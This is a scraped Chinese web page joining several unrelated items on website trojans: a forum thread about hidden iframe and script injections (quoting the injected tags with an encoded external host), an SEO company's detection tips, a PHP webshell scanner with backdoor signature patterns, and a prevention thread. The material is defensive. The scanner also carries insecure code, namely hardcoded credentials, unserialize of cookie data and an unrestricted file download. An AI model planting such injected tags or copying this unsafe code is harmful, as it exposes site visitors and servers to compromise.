网站木马检测如何挂木马?

千里之行 始于足下
欢迎加入我们,一同切磋技术。 &
用户名: &&&
密 码: &
共有 4039 人关注过本帖
标题:asp网站被挂木马了,怎么办?
等 级:新手上路
帖 子:177
结帖率:100%
&&问题点数:0&&回复次数:5&&&
asp网站被挂木马了,怎么办?
我的网站文件下面被添加了&iframe src=/gg.htm width=0 height=0&&/iframe&,所以打开时候很慢,我把这个代码删除了,但是不久又来了,怎么办啊?谢谢大家帮我看下了
搜索更多相关主题的帖子:
&&&&&&&&&&
等 级:新手上路
帖 子:949
按日期搜索,,,和原来的备份对比。看是否有多余的。.asp文件
删除掉,,然后清除所有文件中的木马
等 级:新手上路
帖 子:173
查询下最近的文件,肯定被放了一个,可能不止一个。asp文件,或者是一个ASPX文件。
等 级:版主
威 望:209
帖 子:12488
专家分:19042
这有可能是服务器自身被感染,彻底根除的办法就是解决掉服务器自身的病毒才可以。
来 自:广东省深圳
等 级:职业侠客
帖 子:1028
专家分:305
给你参考下(不知道合不合适你)
是&iframe&...&/iframe&和&script&...&/script&挂马的一些解决方法:
解决全部网页木马的技巧
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来写出文章给大家参考下。
前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂&script&木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:&&
注意,以下地址含有木马,请不要轻易访问:
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
&script src=http://%76%63%63%64%2E%63%6E&&/script&
汗死,一连插入了N个一样的&script&标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
document.write(&&div style='display:none'&&)
document.write(&&iframe src=/b1.htm?id=017 width=0 height=0&&/iframe&&)
document.write(&&/div&&)
又用迅雷下载/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!
var Kfqq, Qqs=&&; qwfgsg=&LLLL\\XXXXXLD&; Kfqq = Q
(...略)(下面还有N个统计的JS代码) 网页教学网
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,&script&木马的特点是什么:
&script src=http://%76%63%63%64%2E%63%6E&&/script&
对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他&object&代码,不管这么多,来多少杀多少。
来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:
解决方案1:
iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将&script&标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了&script&木马的页面m
解决方案2:
iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}
原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了
解决了问题!呵呵!
[bo]转贴:/onews.asp?id=114[/bo]
本文的地址是: /onews.asp?id=114&&转载请注明出处!
[[it] 本帖最后由 lele2007 于
15:59 编辑 [/it]]
等 级:新手上路
帖 子:52
有一些是放在数据库里的,你不光要看网页文件,还要看一下数据库。可以用批处理方式净除。
版权所有,并保留所有权利。
Powered by , Processed in 0.077678 second(s), 7 queries.
Copyright&, BCCN.NET, All Rights Reserved如何查看网站是否被挂木马? - A5创业网
当前位置:&&&
如何查看网站是否被挂木马?
16:54&&来源:天津文率科技有限公司&
  在21世纪互联网今天,很多的企业最不愿意看到的就是自己花费心思建设的官方网站,在还没有为企业赢得一定的利润之前,就应该被挂木马,并且据天津网站建设-文率科技了解,目前很多的企业对于网站建设并不了解,不知道如何监测和预防木马的出现,为此,文率小编今天特意为大家总结一些关于网站监测木马的方式,希望能够更好的帮助您运营企业网站。
  一、在线监测
  从事SEO优化工作的站长应该都清楚,如果在搜索引擎框框内输入site:+网站,就能看到我们网站网页被收录的情况,不仅如此,通过此种方式同样可以看大我们网站的安全情况。另外,现在很多的企业使用的服务器内大多数都会安装杀毒软件,而这些安全软件中大多都有在线木马监测功能,一旦有木马入侵我们的网站,这些安全软件都会进行提示以及清理。当然,企业自己要要自己定期的对网站做全面监测,只有这样才能更好的守护网站的安全。
  二、访问网站时提示网站有病毒
  随着互联网的发展,目前在互联网中存在很多的杀毒软件,当自己访问网站时,如果杀毒软件提示存在风险或者是网站有病毒,这时就应该认真的检测一下网站了。如果被人挂马了,自然说明网站的控制权在别人的手里,一旦对方是有所图的,改掉网站的内容或者信息,那这这对于企业而言将会造成不可弥补的损失,所以在此,天津网站建设-文率科技提醒大家,也不要访问一些有病毒的网站,以免受感染了。
  三、网站源代码
  大部分企业网站被挂木马都是挂在首页的位置,当企业打开自己的网站显示的并非是自己的所添加的内容,那么可以肯定这些内容一定是网站黑客挂上去的,并且有些黑链还会隐藏到网站的源代码中,网站首页是看不到的,这时候就需要我们一行一行的检查网站源代码了,一般的木马都是放在头部或者尾部,企业在检查的时候可以着重的检查这两个部分,不过,其他部分也不能放过哦,尽量做到万无一失。
  四、FTP
  一般情况,检查网站是不是通过FTP或者登陆服务器查看文件的修改时间,因为键入是黑客的话要是他修改了网站文件,那么改文件的修改的时间就会跟改变,如果某些文件的修改时间明显比其他文件要晚,而我们自己并没有改动过,那么说明这个文件已经被黑客修改过了,这时就说明你的网站可能已经中毒或挂上了木马,而这通过查看源文件的方式就可以看到。
  五、死链接
  众所周知,网站死链接对于网站排名的影响力,一旦您的网站出现过多的死链,那么您的网站一定不会在搜索引擎中占有好的排名,而一般情况下黑客会在您网站的内页中挂上木马,因为内页被挂木马的话一般是很难察觉的,建议大家一定要利用专业的查死链工具进行查找,会出现一些链接,然后找到这些代码,从网站后台进行删除。
  网站被挂木马并不可怕,可怕的是不知道如何处理木马,相信看过小编为您分享的文章,聪明的您心中一定会有自己的对对策,在此还需要提醒大家,如果不想您的网站经常被挂木马,在进行网站建设时,一定要选择与专业的建站服务商合作,一般情况下,专业建站服务商的技术都是非常出色。
  原文出自于天津网站建设-文率科技官网:/home/article/detail/id/643.html,如果需要转载的话,请您注明原地址,谢谢!
责任编辑:sunpeipei
作者:文率科技
延伸阅读:关键词:
变设龙 企业高质量图片智造平台
增值电信业务经营许可证:苏B2- 在线数据处理与交易许可证:苏B2-
编辑热线:6-2
A5创业网 徐州八方网络科技有限公司 版权所有
扫一扫关注最新创业资讯php网站被挂木马后的修复方法总结
投稿:shichen2014
字体:[ ] 类型:转载 时间:
这篇文章主要介绍了php网站被挂木马后的修复方法,总结分析了Linux与Windows系统上木马的查杀方法,并给出了一个完整的木马查找工具实例,需要的朋友可以参考下
本文实例总结了php网站被挂木马后的修复方法。分享给大家供大家参考。具体方法如下:
在linux中我们可以使用命令来搜查木马文件,到代码安装目录执行下面命令
代码如下:find ./ -iname "*.php" | xargs grep -H -n "eval(base64_decode"
搜出来接近100条结果,这个结果列表很重要,木马都在里面,要一个一个文件打开验证是否是木马,如果是,马上删除掉
最后找到10个木马文件,存放在各种目录,都是php webshell,功能很齐全,用base64编码
如果你在windows中查找目录直接使用windows文件搜索就可以了,可以搜索eval或最近修改文件,然后如果是dedecms我们要查看最新dedecms漏洞呀然后修补。
下面给个php木马查找工具,直接放到你站点根目录
代码如下:&?php
/**************PHP Web木马扫描器************************/
/* [+] 作者: alibaba */
/* [+] MSN:
/* [+] 首发: t00ls.net , 转载请注明t00ls */
/* [+] 版本: v1.0 */
/* [+] 功能: web版php木马扫描工具*/
/* [+] 注意: 扫描出来的文件并不一定就是后门, */
/* 请自行判断、审核、对比原文件。*/
/* 如果你不确定扫出来的文件是否为后门,*/
/* 欢迎你把该文件发给我进行分析。*/
/*******************************************************/
ob_start();
set_time_limit(0);
$username = "t00ls"; //设置用户名
$password = "t00ls"; //设置密码
$md5 = md5(md5($username).md5($password));
$version = "PHP Web木马扫描器v1.0";
PHP Web 木马扫描器
$realpath = realpath('./');
$selfpath = $_SERVER['PHP_SELF'];
$selfpath = substr($selfpath, 0, strrpos($selfpath,'/'));
define('REALPATH', str_replace('//','/',str_replace('\','/',substr($realpath, 0, strlen($realpath) - strlen($selfpath)))));
define('MYFILE', basename(__FILE__));
define('MYPATH', str_replace('\', '/', dirname(__FILE__)).'/');
define('MYFULLPATH', str_replace('\', '/', (__FILE__)));
define('HOST', "http://".$_SERVER['HTTP_HOST']);
&title&&?php echo $version?&&/title&
&meta http-equiv="Content-Type" content="text/ charset=gb2312" /&
body{margin:0}
body,td{font: 12px Arial,Tline-height: 16}
a {color: #00f;text-decoration:}
a:hover{color: #f00;text-decoration:}
.alt1 td{border-top:1px solid #border-bottom:1px solid #background:#f1f1f1;padding:5px 10px 5px 5}
.alt2 td{border-top:1px solid #border-bottom:1px solid #background:#f9f9f9;padding:5px 10px 5px 5}
.focus td{border-top:1px solid #border-bottom:1px solid #background:#padding:5px 10px 5px 5}
.head td{border-top:1px solid #border-bottom:1px solid #background:#e9e9e9;padding:5px 10px 5px 5font-weight:}
.head td span{font-weight:}
if(!(isset($_COOKIE['t00ls']) && $_COOKIE['t00ls'] == $md5) && !(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5)))
echo '&form id="frmlogin" name="frmlogin" method="post" action=""&用户名: &input type="text" name="username" id="username" /& 密码: &input type="password" name="password" id="password" /& &input type="submit" name="btnLogin" id="btnLogin" value="登陆" /&&/form&';
elseif(isset($_POST['username']) && isset($_POST['password']) && (md5(md5($_POST['username']).md5($_POST['password']))==$md5))
setcookie("t00ls", $md5, time()+60*60*24*365,"/");
echo "登陆成功!";
header( 'refresh: 1; url='.MYFILE.'?action=scan' );
setcookie("t00ls", $md5, time()+60*60*24*365,"/");
$setting = getSetting();
$action = isset($_GET['action'])?$_GET['action']:"";
if($action=="logout")
setcookie ("t00ls", "", time() - 3600);
Header("Location: ".MYFILE);
if($action=="download" && isset($_GET['file']) && trim($_GET['file'])!="")
$file = $_GET['file'];
ob_clean();
if (@file_exists($file)) {
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="".basename($file).""");
echo file_get_contents($file);
&table border="0" cellpadding="0" cellspacing="0" width="100%"&
&tbody&&tr class="head"&
&td&&?php echo $_SERVER['SERVER_ADDR']?&&span style="float: font-weight:"&&?php echo "&a href='http://www.t00ls.net/'&$version&/a&"?&&/span&&/td&
&tr class="alt1"&
&td&&span style="float:"&&?=date("Y-m-d H:i:s",mktime())?&&/span&
&a href="?action=scan"&扫描&/a& |
&a href="?action=setting"&设定&/a& |
&a href="?action=logout"&登出&/a&
&/tbody&&/table&
if($action=="setting")
if(isset($_POST['btnsetting']))
$Ssetting = array();
$Ssetting['user']=isset($_POST['checkuser'])?$_POST['checkuser']:"php | php? | phtml";
$Ssetting['all']=isset($_POST['checkall'])&&$_POST['checkall']=="on"?1:0;
$Ssetting['hta']=isset($_POST['checkhta'])&&$_POST['checkhta']=="on"?1:0;
setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/");
echo "设置完成!";
header( 'refresh: 1; url='.MYFILE.'?action=setting' );
&form name="frmSetting" method="post" action="?action=setting"&
&FIELDSET style="width:400px"&
&LEGEND&扫描设定&/LEGEND&
&table width="100%" border="0" cellspacing="0" cellpadding="0"&
&td width="60"&文件后缀:&/td&
&td width="300"&&input type="text" name="checkuser" id="checkuser" style="width:300" value="&?php echo $setting['user']?&"&&/td&
&td&&label for="checkall"&所有文件&/label&&/td&
&td&&input type="checkbox" name="checkall" id="checkall" &?php if($setting['all']==1) echo "checked"?&&&/td&
&td&&label for="checkhta"&设置文件&/label&&/td&
&td&&input type="checkbox" name="checkhta" id="checkhta" &?php if($setting['hta']==1) echo "checked"?&&&/td&
&td&&&/td&
&input type="submit" name="btnsetting" id="btnsetting" value="提交"&
&/fieldset&
$dir = isset($_POST['path'])?$_POST['path']:MYPATH;
$dir = substr($dir,-1)!="/"?$dir."/":$
&form name="frmScan" method="post" action=""&
&table width="100%%" border="0" cellspacing="0" cellpadding="0"&
&td width="35" style="vertical-align: padding-left:5"&扫描路径:&/td&
&td width="690"&
&input type="text" name="path" id="path" style="width:600px" value="&?php echo $dir?&"&
&&&input type="submit" name="btnScan" id="btnScan" value="开始扫描"&&/td&
&/table(www.jb51.net)&
if(isset($_POST['btnScan']))
$start=mktime();
$is_user = array();
$is_ext = "";
$list = "";
if(trim($setting['user'])!="")
$is_user = explode("|",$setting['user']);
if(count($is_user)&0)
foreach($is_user as $key=&$value)
$is_user[$key]=trim(str_replace("?","(.)",$value));
$is_ext = "(.".implode("($|.))|(.",$is_user)."($|.))";
if($setting['hta']==1)
$is_hta=1;
$is_ext = strlen($is_ext)&0?$is_ext."|":$is_
$is_ext.="(^.htaccess$)";
if($setting['all']==1 || (strlen($is_ext)==0 && $setting['hta']==0))
$is_ext="(.+)";
$php_code = getCode();
if(!is_readable($dir))
$dir = MYPATH;
$count=$scanned=0;
scan($dir,$is_ext);
$end=mktime();
$spent = ($end - $start);
&div style="padding:10 background-color:#ccc"&扫描: &?php echo $scanned?& 文件| 发现: &?php echo $count?& 可疑文件| 耗时: &?php echo $spent?& 秒&/div&
&table width="100%" border="0" cellspacing="0" cellpadding="0"&
&tr class="head"&
&td width="15" align="center"&No.&/td&
&td width="48%"&文件&/td&
&td width="12%"&更新时间&/td&
&td width="10%"&原因&/td&
&td width="20%"&特征&/td&
&td&动作&/td&
&?php echo $list?&
ob_flush();
function scan($path = '.',$is_ext){
global $php_code,$count,$scanned,$
$ignore = array('.', '..' );
$replace=array(" ","n","r","t");
$dh = @opendir( $path );
while(false!==($file=readdir($dh))){
if( !in_array( $file, $ignore ) ){
if( is_dir( "$path$file" ) ){
scan("$path$file/",$is_ext);
$current = $path.$
if(MYFULLPATH==$current)
if(!preg_match("/$is_ext/i",$file))
if(is_readable($current))
$scanned++;
$content=file_get_contents($current);
$content= str_replace($replace,"",$content);
foreach($php_code as $key =& $value)
if(preg_match("/$value/i",$content))
$j = $count % 2 + 1;
$filetime = date('Y-m-d H:i:s',filemtime($current));
$reason = explode("-&",$key);
$url = str_replace(REALPATH,HOST,$current);
preg_match("/$value/i",$content,$arr);
&tr class='alt$j' onmouseover='this.className="focus";' onmouseout='this.className="alt$j";'&
&td&$count&/td&
&td&&a href='$url' target='_blank'&$current&/a&&/td&
&td&$filetime&/td&
&td&&font color=red&$reason[0]&/font&&/td&
&td&&font color=#090&$reason[1]&/font&&/td&
&td&&a href='?action=download&file=$current' target='_blank'&下载&/a&&/td&
//echo $key . "-" . $path . $file ."(" . $arr[0] . ")" ."&br /&";
//echo $path . $file ."&br /&";
closedir( $dh );
function getSetting()
$Ssetting = array();
if(isset($_COOKIE['t00ls_s']))
$Ssetting = unserialize(base64_decode($_COOKIE['t00ls_s']));
$Ssetting['user']=isset($Ssetting['user'])?$Ssetting['user']:"php | php? | phtml | shtml";
$Ssetting['all']=isset($Ssetting['all'])?intval($Ssetting['all']):0;
$Ssetting['hta']=isset($Ssetting['hta'])?intval($Ssetting['hta']):1;
$Ssetting['user']="php | php? | phtml | shtml";
$Ssetting['all']=0;
$Ssetting['hta']=1;
setcookie("t00ls_s", base64_encode(serialize($Ssetting)), time()+60*60*24*365,"/");
function getCode()
return array(
'后门特征-&'=&'',
'后门特征-&c99shell'=&'c99shell',
'后门特征-&phpspy'=&'phpspy',
'后门特征-&Scanners'=&'Scanners',
'后门特征-&cmd.php'=&'cmd.php',
'后门特征-&str_rot13'=&'str_rot13',
'后门特征-&webshell'=&'webshell',
'后门特征-&EgY_SpIdEr'=&'EgY_SpIdEr',
'后门特征-&'=&'',
'后门特征-&SECFORCE'=&'SECFORCE',
'后门特征-&eval("?&'=&'eval(('|")?&',
'可疑代码特征-&system('=&'system(',
'可疑代码特征-&passthru('=&'passthru(',
'可疑代码特征-&shell_exec('=&'shell_exec(',
'可疑代码特征-&exec('=&'exec(',
'可疑代码特征-&popen('=&'popen(',
'可疑代码特征-&proc_open'=&'proc_open',
'可疑代码特征-&eval($'=&'eval(('|"|s*)\$',
'可疑代码特征-&assert($'=&'assert(('|"|s*)\$',
'危险MYSQL代码-&returns string soname'=&'returnsstringsoname',
'危险MYSQL代码-&into outfile'=&'intooutfile',
'危险MYSQL代码-&load_file'=&'select(s+)(.*)load_file',
'加密后门特征-&eval(gzinflate('=&'eval(gzinflate(',
'加密后门特征-&eval(base64_decode('=&'eval(base64_decode(',
'加密后门特征-&eval(gzuncompress('=&'eval(gzuncompress(',
'加密后门特征-&eval(gzdecode('=&'eval(gzdecode(',
'加密后门特征-&eval(str_rot13('=&'eval(str_rot13(',
'加密后门特征-&gzuncompress(base64_decode('=&'gzuncompress(base64_decode(',
'加密后门特征-&base64_decode(gzuncompress('=&'base64_decode(gzuncompress(',
'一句话后门特征-&eval($_'=&'eval(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&assert($_'=&'assert(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&require($_'=&'require(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&require_once($_'=&'require_once(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&include($_'=&'include(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&include_once($_'=&'include_once(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&call_user_func("assert"'=&'call_user_func(("|')assert("|')',
'一句话后门特征-&call_user_func($_'=&'call_user_func(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'一句话后门特征-&$_POST/GET/REQUEST/COOKIE[?]($_POST/GET/REQUEST/COOKIE[?]'=&'$_(POST|GET|REQUEST|COOKIE)[([^]]+)](('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[',
'一句话后门特征-&echo(file_get_contents($_POST/GET/REQUEST/COOKIE'=&'echo(file_get_contents(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'上传后门特征-&file_put_contents($_POST/GET/REQUEST/COOKIE,$_POST/GET/REQUEST/COOKIE'=&'file_put_contents(('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[([^]]+)],('|"|s*)\$_(POST|GET|REQUEST|COOKIE)',
'上传后门特征-&fputs(fopen("?","w"),$_POST/GET/REQUEST/COOKIE['=&'fputs(fopen((.+),('|")w('|")),('|"|s*)\$_(POST|GET|REQUEST|COOKIE)[',
'.htaccess插马特征-&SetHandler application/x-httpd-php'=&'SetHandlerapplication/x-httpd-php',
'.htaccess插马特征-&php_value auto_prepend_file'=&'php_valueauto_prepend_file',
'.htaccess插马特征-&php_value auto_append_file'=&'php_valueauto_append_file'
希望本文所述对大家基于php的网站安全建设有所帮助。
您可能感兴趣的文章:
大家感兴趣的内容
12345678910
最近更新的内容
常用在线小工具在网站上挂木马是怎么回事?怎么挂的?_百度知道
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。
在网站上挂木马是怎么回事?怎么挂的?
为您推荐:
其他类似问题
您可能关注的内容
换一换
回答问题,赢新手礼包教程篇:五个方面何防止网站被挂木马
查看:144 | 回复:5
主题帖子积分
尚未落伍(少量栏能回帖), 积分 -13, 距离下一级还需 3 积分
尚未落伍(少量栏能回帖), 积分 -13, 距离下一级还需 3 积分
&&&&&&&&&&&&&&&&&&&&
[i=s] 本帖最后由 佛山凯龙网络 于
15:50 编辑 [/i]
核心提示:经常有人会问:我的网站被莫名的挂上木马,怎么能有效的预防网站被挂马?这个问题需要分具体情况来具体分析。
经常有人会问:我的网站被莫名的挂上木马,怎么能有效的预防网站被挂马?这个问题需要分具体情况来具体分析。
一、如果是自己的服务器因为你只需要远程登录,就可以管理整个服务器,权限比较大,所以你可以把网站文件夹(除数据库外)其他全设置为只读。
如果是因为webshell的原因,你要先把找到被黑客入侵后植入的Shell文件,删除后再设置。但是webshell一般都是通过注入或者远程溢出拿到,所以网站要做好防注入,服务器要勤打补丁。
二、如果是虚拟主机,购买来的空间
这种情况下你可操作的东西比较少,那么只有登陆到管理系统上设置。
现在一般的系统都有这样的功能。你可以去找下。把相关文件设置为只读!或者设置目录权限。设置为只读是防止被入侵比较好的办法之一。
三、程序方面
检查你的程序。方法是在ftp中以时间进行排序,查看你的文件是否被别人改动过,另外就是尽量过滤掉一些比较敏感的字符。
四、一旦出现木马,就需要赶紧找到,一般木马以的形式出现,或者以文件的形式在你的上传图片目录和文件目录中,仔细查找这两个地方。
五、尽快跟空间服务商联系,让他们扫描你的网站,避免一切可疑文件存在。作者:()
网站建设 防盗门
主题帖子积分
落伍者(一心一意), 积分 289, 距离下一级还需 711 积分
落伍者(一心一意), 积分 289, 距离下一级还需 711 积分
挂了就挂了吧 重新来就是了!
主题帖子积分
落伍者(一心一意), 积分 674, 距离下一级还需 326 积分
落伍者(一心一意), 积分 674, 距离下一级还需 326 积分
还没有被挂过马&&呵呵、
主题帖子积分
落伍者(一心一意), 积分 415, 距离下一级还需 585 积分
落伍者(一心一意), 积分 415, 距离下一级还需 585 积分
八错,我就不会这种黑客的知识,正好补充下,呵呵
《玩的就是新媒体》电子书
2016年1月第一次印刷 营销推广【全是干货】
加Q: V:sun_bocheng
主题帖子积分
尚未落伍(少量栏能回帖), 积分 -21, 距离下一级还需 11 积分
尚未落伍(少量栏能回帖), 积分 -21, 距离下一级还需 11 积分
这样啊。。。。。。。。。。。。
主题帖子积分
尚未落伍(少量栏能回帖), 积分 -20, 距离下一级还需 10 积分
尚未落伍(少量栏能回帖), 积分 -20, 距离下一级还需 10 积分
朕在自己的寝宫~~~~
该帐号已经进行QQ绑定
论坛事务客服(8:30-17:00):
&&&&商务广告客服(8:30-21:00,限广告合作):
落伍者创建于,本站内容均为会员发表,并不代表落伍立场!
拒绝任何人以任何形式在本论坛发表与中华人民共和国法律相抵触的言论!
落伍官方微信:2030286 邮箱:(|)
浙ICP备号 BBS专项电子公告通信管[号
  落伍法律顾问: ITlaw-庄毅雄

我要回帖

更多关于 网站挂木马 的文章

 

随机推荐